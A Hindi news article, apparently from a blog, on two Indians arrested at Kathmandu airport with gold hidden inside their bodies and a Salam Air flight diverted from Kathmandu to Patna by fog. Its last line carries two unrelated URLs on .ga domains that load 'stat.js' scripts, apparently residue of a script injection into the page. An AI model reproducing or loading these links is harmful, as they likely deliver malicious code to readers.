Wednesday, January 19

मस्कट से उड़ा विमान का पटना में आपात लैंडिंग, दो भारतीय गिरफ्तार अंदरूनी भाग में एक एक किलो सोना

नेपाल की राजधानी काठमांडू के त्रिभुवन एयरपोर्ट से दो किलो सोना के साथ दो भारतीय नागरिकों को पुलिस ने गिरफ्तार कर लिया। एयरपोर्ट पुलिस ने यह नहीं बताया कि दोनों भारत के किस प्रदेश के हैं। दोनों से गहन पूछताछ जारी थी। उधर, ओमान की राजधानी मस्कट से नेपा के काठमांडू जा रहा सलाम एयरवेज का अंतरराष्ट्रीय विमान ओवी 427 को शुक्रवार को राजधानी के जयप्रकाश नारायण अंतरराष्ट्रीय एयरपोर्ट पर उतारा गया। नेपाल की राजधानी काठमांडू का मौसम खराब होने के कारण विमान को पटना एयरपोर्ट पर डायवर्ट किया गया था।

काठमांडू के त्रिभुवन एयरपोर्ट पर घने कोहरे के कारण विजिबिलिटी काफी कम थी जिसके कारण विमानों का आवागमन ठप रहा। लगभग साढ़े तीन घंटे तक सलाम एयरवेज का विमान पटना एयरपोर्ट पर ही खड़ा रहा। जब काठमांडू का मौसम थोड़ा ठीक हुआ तो इसे वापस काठमांडू भेजा गया। इस विमान में 175 यात्री एवं 6 क्रू मेंबर सवार थे। काठमांडू के त्रिभुवन एयरपोर्ट की सुरक्षा एजेंसियों के मुताबिक,  दुबई के रास्ते यूएई के शारजाह से काठमांडू पहुंचे नवीन गोपीचंद और सुरेश लाल की पुलिस ने जांच की। गुप्त सूचना थी कि नेपाल के रास्ते सोना की बड़ी खेप आने वाली है। इसे सीमावर्ती भारत के शहरों में भेजने का प्लान है। इसके बाद सुरक्षा एजेंसियों ने संदेह के आधार पर जांच की।

दोनों यात्रियों का स्थानीय अस्पताल में एक्सरे कराया गया। दोनों ने शरीर के अंदरुनी भाग में एक-एक किलो सोना छिपाकर रखा था। सोना को पुलिस ने जब्त कर लिया। मस्कट से सलाम एयरवेज की विमान संख्या ओवी 427 ने सुबह सात बजे के बजाय 7:58 बजे काठमांडू के लिए उड़ान भरी। यह विमान दोपहर 1:25 बजे के आसपास काठमांडू पहुंच गई लेकिन मौसम खराब होने के कारण इस विमान को पटना एयरपोर्ट पर डायवर्ट कर दिया गया। अपराह्न 2:45 बजे के आसपास इस विमान को पटना एयरपोर्ट पर लैंड कराया गया था। लगभग साढ़े तीन घंटे तक सभी यात्री पटना एयरपोर्ट पर विमान में ही बैठे रहे। विमान के अंदर ही उन्हें एयरपोर्ट प्रबंधन की ओर से दोपहर का भोजन उपलब्ध कराया गया। शाम छह बजे के बाद विमान ने पटना एयरपोर्ट से काठमांडू के लिए उड़ान भरी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

%d bloggers like this: